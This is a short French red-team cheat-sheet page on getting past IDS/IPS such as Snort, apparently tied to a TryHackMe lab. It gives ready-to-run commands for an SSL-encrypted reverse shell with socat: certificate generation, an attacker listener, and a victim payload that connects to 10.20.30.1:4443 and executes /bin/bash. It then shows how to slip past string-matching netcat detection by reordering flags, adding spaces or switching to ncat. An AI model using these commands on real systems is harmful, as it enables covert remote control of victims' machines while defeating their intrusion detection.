[Exploitation/Réseau] IDS/IPS Evasion
Introduction
Cette page décrit des solutions pour contourner des solutions IDS/IPS telles que Snort ou autre.
Manuel
Reverse shell avec certificat SSL
Socat permet l'utilisation de certificat SSL pour chiffrer une connexion. Il va donc nous permettre d'établir un tunnel sécurisé pour exécuter nos commandes à distance.
Tout d'abord, générer un certificat sur la machine de l'attaquant :
openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt
cat thm-reverse.key thm-reverse.crt > thm-reverse.pem
Puis lancez le listener :
socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT
Et sur la machine de la victime, lancez ce payload :
socat OPENSSL:10.20.30.1:4443,verify=0 EXEC:/bin/bash
Votre reverse shell sécurisé est ouvert !
Changement de la donnée brute
Imaginons une règle qui se base sur une chaîne de caractère pour détecter l'utilisation de netcat, on pourrait très facilement la contourner en modifiant la commande.
Admettons un règle qui détecte la présence de cette chaîne :
nc -lvp
On pourrait changer l'ordre des flags :
nc -pvl
Ou ajouter des espaces :
nc -lvp
Ou on peut changer la commande :
ncat -lvp
No Comments